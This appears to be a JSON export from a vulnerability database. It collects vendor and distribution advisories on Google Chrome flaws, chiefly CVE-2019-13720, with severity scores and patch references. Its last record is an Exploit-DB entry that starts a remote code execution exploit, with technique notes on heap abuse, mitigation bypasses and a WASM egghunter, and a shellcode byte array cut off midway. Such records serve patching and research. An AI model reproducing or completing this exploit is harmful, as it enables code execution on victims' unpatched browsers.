"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:07:08", "description": "### *Detect date*:\n10/31/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 78.0.3904.87\n\n### *Solution*:\nUpdate to the latest version \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)6.8High \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-31T00:00:00", "type": "kaspersky", "title": "KLA11601 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2020-06-18T00:00:00", "id": "KLA11601", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11601/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nChrome Releases reports:\n\nThis release includes 47 security fixes, including the below.\n\t Google is aware of reports that an exploit for CVE-2021-21166 exists\n\t in the wild. Please see URL for details.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-03-02T00:00:00", "id": "F00B65D8-7CCB-11EB-B3BE-E09467587C17", "href": "https://vuxml.freebsd.org/freebsd/f00b65d8-7ccb-11eb-b3be-e09467587c17.html", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-05T00:18:43", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: chromium-89.0.4389.90-3.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-04-05T00:18:43", "id": "FEDORA:BF4FC30A0346", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LCIDZ77XUDMB2EBPPWCQXPEIJERDNSNT/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-01T01:51:39", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-89.0.4389.90-3.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-04-01T01:51:39", "id": "FEDORA:C67773052A4D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BBT54RKAE5XLMWSHLVUKJ7T2XHHYMXLH/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-09T21:22:25", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: chromium-78.0.3904.87-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-09T21:22:25", "id": "FEDORA:3608E6051CC4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EIIDTZXEBWMS5CZ6MW6PPU7EZ4VIEFZY/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:39", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-20T01:15:37", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: chromium-89.0.4389.82-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-03-20T01:15:37", "id": "FEDORA:A017F3074280", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FE5SIKEVYTMDCC5OSXGOM2KRPYLHYMQX/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-11-15T03:20:57", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: chromium-78.0.3904.87-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2019-11-15T03:20:57", "id": "FEDORA:AC09F608BFF0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/E4PBGVMZ355Z7XR6CLI4W42NBIXY3JHS/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-11-15T03:55:58", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: chromium-78.0.3904.87-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2019-11-15T03:55:58", "id": "FEDORA:2B88A6092506", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZTDUMER334IGKQEKTUQHRW5PUGM6YINZ/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "The updated packages fix security vulnerabilities. At least one of them is known to be actively exploited. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-17T11:01:53", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193"], "modified": "2021-03-17T11:01:52", "id": "MGASA-2021-0142", "href": "https://advisories.mageia.org/MGASA-2021-0142.html", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Chromium-browser 78.0.3904.87 fixes security issues: Multiple flaws were found in the way Chromium 77.0.3865.120 processes various types of web content, where loading a web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information. (CVE-2019-13699, CVE-2019-13700, CVE-2019-13701, CVE-2019-13702, CVE-2019-13703, CVE-2019-13704, CVE-2019-13705, CVE-2019-13706, CVE-2019-13707, CVE-2019-13708, CVE-2019-13709, CVE-2019-13710, CVE-2019-13711, CVE-2019-13713, CVE-2019-13714, CVE-2019-13715, CVE-2019-13716, CVE-2019-13717, CVE-2019-13718, CVE-2019-13719, CVE-2019-13720, CVE-2019-13721) \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-07T23:36:48", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13699", "CVE-2019-13700", "CVE-2019-13701", "CVE-2019-13702", "CVE-2019-13703", "CVE-2019-13704", "CVE-2019-13705", "CVE-2019-13706", "CVE-2019-13707", "CVE-2019-13708", "CVE-2019-13709", "CVE-2019-13710", "CVE-2019-13711", "CVE-2019-13713", "CVE-2019-13714", "CVE-2019-13715", "CVE-2019-13716", "CVE-2019-13717", "CVE-2019-13718", "CVE-2019-13719", "CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-07T23:36:48", "id": "MGASA-2019-0320", "href": "https://advisories.mageia.org/MGASA-2019-0320.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-03T11:59:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "exploitdb", "title": "Google Chrome 78.0.3904.70 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-13720", "CVE-2019-13720"], "modified": "2022-05-11T00:00:00", "id": "EDB-ID:50917", "href": "https://www.exploit-db.com/exploits/50917", "sourceData": "# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution\r\n# Date: 2022-05-03\r\n# Exploit Author: deadlock (Forrest Orr)\r\n# Type: RCE\r\n# Platform: Windows\r\n# Website: https://forrest-orr.net\r\n# Twitter: https://twitter.com/_ForrestOrr\r\n# Vendor Homepage: https://www.google.com/chrome/\r\n# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip\r\n# Versions: Chrome 76 - 78.0.3904.70\r\n# Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64\r\n# CVE: CVE-2019-13720\r\n# Bypasses: DEP, High Entropy ASLR, CFG, CET\r\n# Github: https://github.com/forrest-orr/WizardOpium\r\n\r\n<html>\r\n<script>\r\n/*;; --------------------------------------------------------------------- |\r\n;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Author: deadlock (Forrest Orr) - 2022 |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Licensed under GNU GPLv3 |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 |\r\n;;;; 64-bit with CPU core counts: |\r\n;;;; ~ 16 cores (non-virtualized) | works |\r\n;;;; ~ 4 cores (virtualized) | works |\r\n;;;; ~ 2 cores (virtualized) | works |\r\n;;;; ~ 1 core (virtualized) | fails |\r\n;;;; |\r\n;;;; All of these tests finished successfully with a 95%+ success rate |\r\n;;;; with the exception of the 1 core tests, which fail with a 100% |\r\n;;;; frequency. Due to the nature of the exploit as both a UAF highly |\r\n;;;; sensitive to the state of the heap and a race condition, it appears |\r\n;;;; that a single core is unable to reliably reproduce the UAF or any |\r\n;;;; kind of consistency in the heap between executions. |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; ## Sandboxing |\r\n;;;; ~ Chrome uses an isolated content child proces running under a |\r\n;;;; restricted token below Low Integrity to render JavaScript. |\r\n;;;; ~ Child process creation is restricted via Windows exploit |\r\n;;;; mitigation features on the OS level for Chrome renderers. |\r\n;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a |\r\n;;;; sandbox escape (this was limited to Windows 7 since in newer |\r\n;;;; versions of Windows win32k syscalls are locked in Chrome for |\r\n;;;; security purposes). |\r\n;;;; ~ Run Chrome with the \"--no-sandbox\" parameter in order to execute |\r\n;;;; the WinExec shellcode within this exploit source. |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; ## Notes |\r\n;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist |\r\n;;;; for both infoleaks and R/W primitives. |\r\n;;;; ~ The exploit should in theory work in any version of Chrome up to |\r\n;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. |\r\n;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is |\r\n;;;; initialized resulting in the creation of a single page of +RWX |\r\n;;;; JIT memory. This is then overwritten with a 673 byte egghunter |\r\n;;;; shellcode. |\r\n;;;; ~ The egghunter will scan through all committed +RW regions of |\r\n;;;; private memory within the compromised chrome.exe renderer process |\r\n;;;; and mark any region it identifies as +RWX which contains the egg |\r\n;;;; QWORD bytes and subsequentially execute it via a CALL instruction. |\r\n;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 |\r\n;;;; array prefixed by the following egg QWORD bytes: |\r\n;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; ## Credits |\r\n;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit |\r\n;;;; chain in the wild. |\r\n;;;; -------------------------------------------------------------------- */\r\n\r\nconst Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 